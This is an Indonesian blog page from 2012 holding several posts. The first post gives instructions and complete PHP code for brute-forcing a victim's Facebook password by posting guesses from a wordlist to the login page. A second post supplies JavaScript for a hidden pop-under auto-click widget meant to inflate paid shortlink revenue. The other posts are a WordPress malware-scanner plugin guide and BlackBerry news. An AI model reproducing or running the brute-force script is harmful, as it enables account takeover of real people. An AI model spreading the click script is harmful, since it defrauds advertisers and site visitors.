Minggu, 25 Maret 2012

Crack Akun Facebook Dengan Facebook Brute Force

INDOMEETING.NET - Crack Akun Facebook Dengan Facebook Brute Force dalam pertemuan kali ini saya akan memberikan script untuk melakukan Brute Force akun facebook. mungkin banyak di sana trik untuk melakukan pencurian akun facebook, namun kali berbeda karena di sini saya akan menggunakan script yang simple saja .

Pertama kali anda sediakan hosting yang mendukung PHP bisahosting gratis ataupun yang berbayar, setelah itu silahkan baca langkah-langkah berikut ini;

1. Login ke akun hosting anda sudah pasti login dulu :d.
2. Buat folder baru di hosting anda nama folder terserah anda.
3. Silahkan copy PHP CODE dan paste ke notepad lalu save dengan nama terserah anda yang pentig ekstensi nya .php lanjutkan dengan upload file ke hosting anda.
4. Buat 1 file baru dengan nama password.txt lalu isi dengan beberapa list password dan upload ke folder yang sama dengan file .php tadi.
5. Selanjutnya anda buka web anda contoh http://example.com/nama-folder/

Untuk php script nya silahkan lihat di bawah;

###############################
# Face Book Brute Forcer
################################
# WWW.INDOMEETING.NET
###############################
# Created by Sabo Tase
################################
set_time_limit(0);
$username ="email-target@email.com"; // Email target korban
$dictionary ="password.txt"; // file password

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
Readmore

Mengamankan Wordpress Blog Dari Malicious Code

INDOMEETING.NET - Mengamankan Wordpress Blog Dari Malicious Code anda pasti pernah memakai fitur dari CMS ini, namun tau kah anda jika hanya dengan Wrodpress themes yang telah di susupi code malicious maka si empu dari pemilik Wordpress themes dipastikan mampu membaca data wordpress anda.

Nah, kali ini yang bertindak sebagai pengaman Wordpress blog kita adalah TAC (Theme Authenticity Checker) dan ini termasuk salah satu Wordpress Plugin yang mampu mendeteksi keberadaan malicious code di dalam Wrodpress themes yang hendak anda pilih.

Themes Wordpress sangat mungkin disisipi oleh malicious code, apalagi jika themes itu di ambil dari sembarang tempat yang tidak jelas. Namun dengan anda memasang plugin TAC (Theme Authenticity Checker) anda akan merasa aman ketika memilih suatu themes, bahkan TAC mampu menunjukan di bagian mana code berbahaya itu disisipkan ke dalam Wordpress themes sehingga anda pun bisa melihat seperti apa code itu.


Berikut cara install plugin tersebut:

1. Download versi terbaru TAC di sini dan ekstrak.
2. Upload Tac.php ke directory /wp-content/plugin/.
3. Aktifkan plugin melalui menu "plugin" di menu wordpress.
4. Lanjutkan ke desain => TAC di wordpress admin.
5. Hasil scan akan di tampilkan untuk setiap thema dengan nama file dan nomor baris dari setiap ancaman.

Nah, segera amakan blog anda dari serangan malicious code :).
Readmore

Sabtu, 24 Maret 2012

Cara Mencurangi (adfoc.us adf.ly ity.im) Dengan Script Auto Klik

INDOMETING.NET - Cara Mencurangi (adfoc.us adf.ly ity.im) Dengan Script Auto Klik. Sebelumnya pasti anda sudah mengetahui apa itu (adfoc adf.ly dan ity.im) mereka adalah anggota yang menyediakan fitur short url link da di samping itu anda juga akan mendapatkan sejumlah uang dari hasil short url link yang anda peroleh dari penyedia fitur tersebut.

Namun betapa kecewanya setelah melihat trafik di akun kita setelah lama membuat beberapa short url link tapi yang melakukan klik hanya sedikit :D, ok jangan kecewa dulu karena kali ini kita bisa mengakali short url link tersebut dengan code berikut.

Sebelumnya anda harus mempunyai blog/web untuk tempat script Cara Mencurangi (adfoc.us adf.ly ity.im) Dengan Script Auto Klik.

Silakan buat widget baru pada situs sobat dan masukkan script dibawah ini:

<script type="text/javascript">
function addEvent(obj, eventName, func){
if (obj.attachEvent) {
obj.attachEvent("on" + eventName, func);
} else if(obj.addEventListener)
{ obj.addEventListener(eventName, func, true);
} else
{ obj["on" + eventName] = func;
}
} addEvent(window, "load", function(e){
addEvent(document.body, "click", function(e)
{ if(document.cookie.indexOf("bkc=lyk") == -1)
{
var w = window.open('http://adfoc.us/226753094646','height=10, width=10, top=1900, left=1900, scrollbars=yes')
document.cookie = "sa";
window.focus(); } }); });
</script>



Dalam text "URL-LINK-ANDA" silahkan anda ganti dengan URL yang anda dapatkan dari
(adfoc.us adf.ly ity.im) lalu save, setelah itu slahkan anda buka link web//blog anda dan coba lakukan klik di sembarang tempat lihat apa yang terjadi :D.
Readmore

Jumat, 23 Maret 2012

App RIM Will Give BlackBerry 10 Prototype Device to Developers at Jam Conference

RIM Will Give BlackBerry 10 Prototype Device to Developers at Jam Conference blackberry-10-logo
RIM Will Give BlackBerry 10 Prototype Device to Developers at Jam Conference - RIM said they would eventually offer developer devices for the BlackBerry 10 platform. Today, RIM has announced they will not only launch the BlackBerry 10 developer tools in beta, but developer attendees will receive a limited edition developer prototype device â€" the BlackBerry 10 Dev Alpha. However, RIM makes it clear that this is not a BlackBerry 10 smartphone â€" it is a prototype running a modified version of the PlayBook OS which will help developers design their apps for the BlackBerry 10 smartphone form factor.  It’s not the final hardware or OS â€" it’s a device to help developers get started with designing for what’s coming.
The prototype devices will only be offered to BlackBerry 10 Jam developer attendees, as it is a prototype testing device meant specifically for them. It will not be a commercial product and will not be seeded to end users or attendees of BlackBerry World. There is limited capacity for BlackBerry 10 Jam, so developers should register as soon as possible to be part of this amazing opportunity.
Register for BlackBerry 10 Jam at www.blackberryjamconference.com

source for RIM Will Give BlackBerry 10 Prototype Device to Developers at Jam ConferenceDownload V12 Zagato OS 6.0 for 9650 For Blackberry
Readmore

App BlackBerry Messenger 6.2.0.24 Now Available in Beta Zone

BlackBerry Messenger 6.2.0.24 Now Available in Beta Zone
bbm_mastResearch In Motion has been updating their programs in BlackBerry Beta Zone quite frequently this week. BlackBerry Messenger has now been updated to version 6.2.0.24, with the following changes and known issues:
Fixed Isses
User is returned to the contact list after sending a voice note via the convenience key if the chat is opened from the Messages application.Virtual keyboard does not appear automatically when editing personal messageWhen trying to switch chat from switch chat menu within conversation, user information is partially cutoffSend picture dialog is displayed as a vertical bar for device font size 14.
Known Issues
Highlighting a BBM contact displays a different contact’s display picture.Pressing the convenience key while the menu is open in a chat returns the user to the contact list if the chat is opened from the Messages application.Scrolling quickly in the inline edit view allows the focus to move out on to the user’s avatar.Pressing the Enter key while the focus is on the user’s avatar initiates the inline edit view.Some smileys remained as text in a message sent to a multiperson chat for all participants.Send voice note dialog buttons are cut off in landscape mode when the virtual keyboard is displayed.
You can download BBM 6.2.0.24 from Beta Zone here.

source for BlackBerry Messenger 6.2.0.24 Now Available in Beta ZoneWunderlist For Blackberry
Readmore

App RIM Confirms Issue with PIN Messages in BlackBerry 7 Devices

RIM Confirms Issue with PIN Messages in BlackBerry 7 Devices pin-messages

Research In Motion officially confirmed today in a Knowledge Base article that certain devices are experiencing an issue with PIN messages. The problem lies with the PIN messages option not even appearing for some users. However, receiving PIN message, reply to, and forward will still function as per normal.

According to RIM, the problem affects the following devices:

BlackBerry ® Bold 9930BlackBerry ® Bold 9900BlackBerry ® Bold 9790BlackBerry ® Bold 9780BlackBerry ® Curve 9380BlackBerry ® Curve 9370BlackBerry ® Curve 9360BlackBerry ® Curve 9350BlackBerry ® Torch 9860BlackBerry ® Torch 9850BlackBerry ® Torch 9810Porsche Design P’9981The problem appears to be only with OS7 devices. RIM states they currently have no time-frame for a fix. Did you or have you ever used PIN messages? Personally, can’t say I’ve ever used this feature much. Sound off in the comments if you think this feature should be continued or killed off.

via BBNews.pl
source for RIM Confirms Issue with PIN Messages in BlackBerry 7 DevicesDownload Plants vs. Zombies v1.3.0 for BlackBerry PlayBook games For Blackberry
Readmore

App RIM Seeking to Hire iOS Developers

RIM Seeking to Hire iOS Developers blackberry-mobile-fusion

Research In Motion is undergoing tribulations. In an effort to retain enterprise customers, they’ve released their Mobile Fusion service. The Mobile Fusion service lets iOS and Android devices to be managed on the BlackBerry Enterprise Service.

The company now appears to be in the market for iOS developers of, “an experienced iOS/Objective-C developer capable of architecting, designing, developing and testing complex applications for iPhone and iPad devices.” RIM is requiring the iOS developer to have at least 2yrs experience and have apps within the iTunes App Store to demo during a candidate interview.

Perhaps, RIM is looking to iOS developers in an effort to build a Mobile Fusion app for the iPhone and iPad. Or, could RIM seriously be considering the option of making BlackBerry Messenger a cross-platform messenger? Check out the full recruitment ad below:

via AllThingsD


source for RIM Seeking to Hire iOS DevelopersDownload V12 Zagato OS 6.0 for 9650 For Blackberry
Readmore